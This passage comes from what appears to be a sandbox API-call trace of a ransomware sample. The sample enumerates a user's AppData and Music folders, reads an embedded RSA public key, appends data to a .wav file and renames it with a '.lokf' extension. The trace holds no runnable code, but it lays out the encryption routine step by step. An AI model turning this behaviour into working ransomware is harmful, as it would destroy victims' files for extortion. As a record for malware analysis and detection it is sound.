HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.754] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.754] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.754] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.754] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.754] PathFindFileNameW (pszPath="") returned="" [0060.754] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.754] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.754] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.754] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.754] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.754] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.754] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0060.754] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.754] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\") returned="IMJP9_0\\" [0060.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0060.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.755] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.755] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.755] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.755] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.755] PathFindFileNameW (pszPath="") returned="" [0060.755] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.755] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0060.755] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.755] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0060.755] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.755] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.755] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adbb0 | out: hHeap=0x660000) returned 1 [0060.755] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.756] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0060.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0060.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.756] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.756] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.756] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.756] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.756] PathFindFileNameW (pszPath="") returned="" [0060.756] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.758] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0060.758] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.758] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x510b3550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x510b3550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOMStore", cAlternateFileName="")) returned 1 [0060.758] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0060.758] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 0 [0060.758] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.758] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.758] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262b28 | out: hHeap=0x660000) returned 1 [0060.758] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.758] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0060.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0060.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0060.759] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0060.759] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.759] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.759] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.759] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.759] PathFindFileNameW (pszPath="") returned="" [0060.759] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.760] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7fb0 | out: hHeap=0x660000) returned 1 [0060.760] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.760] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AU", cAlternateFileName="")) returned 1 [0060.760] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1ea6db0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1ea6db0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Deployment", cAlternateFileName="DEPLOY~1")) returned 1 [0060.760] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 1 [0060.760] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45", cAlternateFileName="JRE17~1.0_4")) returned 0 [0060.760] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0060.760] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0060.760] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0060.760] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0060.760] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0060.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\") returned="EakifiT9ecot40TbvQP\\" [0060.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\") returned="iCD5MmspTIMUES\\" [0060.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\") returned="m4--j\\" [0060.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0060.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0060.760] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0060.760] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0060.760] PathFindFileNameW (pszPath="") returned="" [0060.761] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1318bd70, ftCreationTime.dwHighDateTime=0x1d4cee8, ftLastAccessTime.dwLowDateTime=0x6a5786c0, ftLastAccessTime.dwHighDateTime=0x1d4c998, ftLastWriteTime.dwLowDateTime=0x6a5786c0, ftLastWriteTime.dwHighDateTime=0x1d4c998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.761] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1318bd70, ftCreationTime.dwHighDateTime=0x1d4cee8, ftLastAccessTime.dwLowDateTime=0x6a5786c0, ftLastAccessTime.dwHighDateTime=0x1d4c998, ftLastWriteTime.dwLowDateTime=0x6a5786c0, ftLastWriteTime.dwHighDateTime=0x1d4c998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.761] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b16e4b0, ftCreationTime.dwHighDateTime=0x1d4ca1e, ftLastAccessTime.dwLowDateTime=0xb1c1a270, ftLastAccessTime.dwHighDateTime=0x1d4d50f, ftLastWriteTime.dwLowDateTime=0xb1c1a270, ftLastWriteTime.dwHighDateTime=0x1d4d50f, nFileSizeHigh=0x0, nFileSizeLow=0xc759, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="010DT.wav", cAlternateFileName="")) returned 1 [0060.761] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\010DT.wav") returned=".wav" [0060.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\010DT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\010dt.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.761] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=51033) returned 1 [0060.761] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.764] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc733, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.764] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.764] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xc759, lpOverlapped=0x0) returned 1 [0060.765] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.765] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.765] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.765] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.766] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.766] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.766] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.766] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.766] GetLastError () returned 0x0 [0060.766] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.766] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.766] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.766] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.766] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.766] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.767] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc759, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.767] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.767] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.767] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.767] CloseHandle (hObject=0x5cc) returned 1 [0060.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0060.768] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.768] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290508 | out: hHeap=0x660000) returned 1 [0060.768] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\010DT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\eakifit9ecot40tbvqp\\010dt.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\EakifiT9ecot40TbvQP\\010DT.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js 